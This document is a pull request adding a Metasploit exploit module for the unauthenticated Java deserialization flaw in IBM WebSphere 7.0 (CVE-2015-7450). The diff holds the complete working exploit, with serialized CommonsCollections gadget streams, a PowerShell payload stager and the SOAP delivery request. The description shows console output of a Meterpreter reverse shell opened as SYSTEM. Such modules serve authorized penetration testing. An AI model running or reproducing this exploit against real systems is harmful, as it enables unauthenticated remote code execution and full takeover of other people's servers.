### PR TITLE
IBM Websphere Java Deserialization (RCE)

### DIFF
--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_raw({
           'method'      => 'POST',
           'version'     => '1.1',
-          'raw_headers' => "Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"urn:AdminService\"\r\n",
+          'raw_headers' => "Content-Type: text/xml; charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
           'uri'         => normalize_uri(uri),
           'data'        => req
       })

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => "Nov 6 2015",
       'DefaultTarget'  => 0,
       'DefaultOptions' => {
-            'SSL' => true
+            'SSL' => true,
             'WfsDelay' => 20
       }))
 

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -25,9 +25,11 @@ class MetasploitModule < Msf::Exploit::Remote
             'Liatsis Fotios @liatsisfotios',  # Metasploit Module
 
             # Thanks for helping me:
-            # Kyprianos Vasilopoulos @kavasilo
-            # Dimitriadis Alexios @AlxDm_
-            # Kotsiopoulos Panagiotis
+            # # # # # # # # # # # #
+
+            # Kyprianos Vasilopoulos @kavasilo    # Implemented and reviewed - Metasploit module
+            # Dimitriadis Alexios @AlxDm_         # Assistance and code check
+            # Kotsiopoulos Panagiotis             # Guidance about Size and Buffer implementation
         ],
       'References'     =>
         [
@@ -48,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }))
 
     register_options([
-      OptString.new('TARGETURI', [true, 'The base path to IBM\'s WebSphere SOAP port', '/']),
+      OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
       Opt::RPORT('8880')
     ], self.class)
   end

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          	['CVE', 'CVE-2015-7450'],
+            ['CVE', 'CVE-2015-7450'],
             ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
             ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
             ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -23,13 +23,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
             'Liatsis Fotios @liatsisfotios',  # Metasploit Module
-
-            # Thanks for helping me:
-            # # # # # # # # # # # #
-
-            # Kyprianos Vasilopoulos @kavasilo    # Implemented and reviewed - Metasploit module
-            # Dimitriadis Alexios @AlxDm_         # Assistance and code check
-            # Kotsiopoulos Panagiotis             # Guidance about Size and Buffer implementation
         ],
       'References'     =>
         [
@@ -68,12 +61,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # Generate Payload
       payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
-      payload_exec = Base64.strict_encode64(payload_exec)
+      payload_exec = Rex::Text.encode_base64(payload_exec)
   end
 
   def invoke_ccs(serialized_stream)
       # Decode Serialized Streams
-      serialized_stream = Base64.decode64(serialized_stream)
+      serialized_stream = Rex::Text.decode_base64(serialized_stream)
   end
 
   def gen_payload

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-            'Liatsis Fotios @liatsisfotios',  # Metasploit Module
+            'Liatsis Fotios @liatsisfotios'  # Metasploit Module
         ],
       'References'     =>
         [

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -23,6 +23,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
             'Liatsis Fotios @liatsisfotios'  # Metasploit Module
+
+            # Thanks for helping me:
+            # # # # # # # # # # # #
+
+            # Kyprianos Vasilopoulos @kavasilo    # Implemented and reviewed - Metasploit module
+            # Dimitriadis Alexios @AlxDm_         # Assistance and code check
+            # Kotsiopoulos Panagiotis             # Guidance about Size and Buffer implementation
         ],
       'References'     =>
         [

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -23,11 +23,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
             'Liatsis Fotios @liatsisfotios',  # Metasploit Module
-            '...',
-            'Credits to:',
-            'Kyprianos Vasilopoulos @kavasilo',
-            'Dimitriadis Alexios @AlxDm_',
-            'Kotsiopoulos Panagiotis'
+
+            # Thanks for helping me:
+            # Kyprianos Vasilopoulos @kavasilo
+            # Dimitriadis Alexios @AlxDm_
+            # Kotsiopoulos Panagiotis
         ],
       'References'     =>
         [

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-            ['CVE', 'CVE-2015-7450'],
+            ['CVE', '2015-7450'],
             ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
             ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
             ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_payload
-      # Staging Native Payload 
+      # Staging Native Payload
       exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
       exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
 

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -47,6 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DefaultOptions' => {
             'SSL' => true
+            'WfsDelay' => 20
       }))
 
     register_options([

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-            'Liatsis Fotios @liatsisfotios'  # Metasploit Module
+            'Liatsis Fotios @liatsisfotios'       # Metasploit Module
 
             # Thanks for helping me:
             # # # # # # # # # # # #
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => "Nov 6 2015",
       'DefaultTarget'  => 0,
       'DefaultOptions' => {
-            'SSL' => true,
+            'SSL'      => true,
             'WfsDelay' => 20
       }))
 

--- a/modules/exploits/windows/misc/websphere_java_deserialize.rb
+++ b/modules/exploits/windows/misc/websphere_java_deserialize.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "IBM WebSphere RCE Java Deserialization Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
+        call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
+        remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+            'Liatsis Fotios @liatsisfotios',  # Metasploit Module
+            '...',
+            'Credits to:',
+            'Kyprianos Vasilopoulos @kavasilo',
+            'Dimitriadis Alexios @AlxDm_',
+            'Kotsiopoulos Panagiotis'
+        ],
+      'References'     =>
+        [
+          	['CVE', 'CVE-2015-7450'],
+            ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
+            ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
+            ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+            [ 'IBM WebSphere 7.0.0.0', {} ]
+        ],
+      'DisclosureDate' => "Nov 6 2015",
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+            'SSL' => true
+      }))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to IBM\'s WebSphere SOAP port', '/']),
+      Opt::RPORT('8880')
+    ], self.class)
+  end
+
+
+  def exploit
+      # Decode - Generate - Set Payload / Send SOAP Request
+      soap_request(set_payload)
+  end
+
+  def set_payload
+      # CommonCollections1 Serialized Streams
+      ccs_start = "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQ="
+      ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
+
+      # Generate Payload
+      payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
+      payload_exec = Base64.strict_encode64(payload_exec)
+  end
+
+  def invoke_ccs(serialized_stream)
+      # Decode Serialized Streams
+      serialized_stream = Base64.decode64(serialized_stream)
+  end
+
+  def gen_payload
+      # Staging Native Payload 
+      exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
+
+      # Size up RCE - Buffer
+      cmd_lng = exec_cmd.length
+      lng2str = "0" + cmd_lng.to_s(16)
+      buff = [lng2str].pack("H*")
+
+      rce_pld = buff + exec_cmd
+  end
+
+  def soap_request(inject_payload)
+      # SOAP Request
+      req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
+      req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
+      req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
+      req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
+      req += "</SOAP-ENV:Header>" + "\r\n"
+      req += "<SOAP-ENV:Body>" + "\r\n"
+      req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
+      req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
+      req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
+      req += "</ns1:getAttribute>" + "\r\n"
+      req += "</SOAP-ENV:Body>" + "\r\n"
+      req += "</SOAP-ENV:Envelope>" + "\r\n"
+
+      uri = target_uri.path
+
+      res = send_request_raw({
+          'method'      => 'POST',
+          'version'     => '1.1',
+          'raw_headers' => "Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"urn:AdminService\"\r\n",
+          'uri'         => normalize_uri(uri),
+          'data'        => req
+      })
+  end
+
+end


### PR DESCRIPTION
This module exploits a vulnerability in IBM's WebSphere Application Server identified by CVE-2015-7450. This has a default target `IBM WAS 7.0` on `Port 8880`.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/websphere_java_deserialize`
- [ ] `exploit -j`
- [ ] **Verify** that Server SOAP Port requests or not a SSL connection and apply the proper option on SSL field (default value is `True`)

## Example usage

```
msf > use exploit/windows/misc/websphere_java_deserialize 
msf exploit(websphere_java_deserialize) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(websphere_java_deserialize) > set RHOST 192.168.105.251
RHOST => 192.168.105.251
msf exploit(websphere_java_deserialize) > set LHOST 192.168.105.252
LHOST => 192.168.105.252
msf exploit(websphere_java_deserialize) > options 

Module options (exploit/windows/misc/websphere_java_deserialize):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.105.251  yes       The target address
   RPORT      8880             yes       The target port
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base IBM's WebSphere SOAP path
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.105.252  yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   IBM WebSphere 7.0.0.0


msf exploit(websphere_java_deserialize) > exploit 

[*] Started HTTPS reverse handler on https://192.168.105.252:8443
[*] https://192.168.105.252:8443 handling request from 192.168.105.251; (UUID: t2dkrdaw) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.105.252:8443 -> 192.168.105.251:49287) at 2017-01-03 09:44:34 -0500

meterpreter > sysinfo 
Computer        : WIN-KVJ843364RL
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
```

## Screenshots

![was_rce](https://cloud.githubusercontent.com/assets/5232577/21611055/e6f26038-d1d3-11e6-8cf6-880a672dac5f.png)
--
![was_proc](https://cloud.githubusercontent.com/assets/5232577/21645800/3aec4294-d29c-11e6-9131-bf5abea723ab.png)
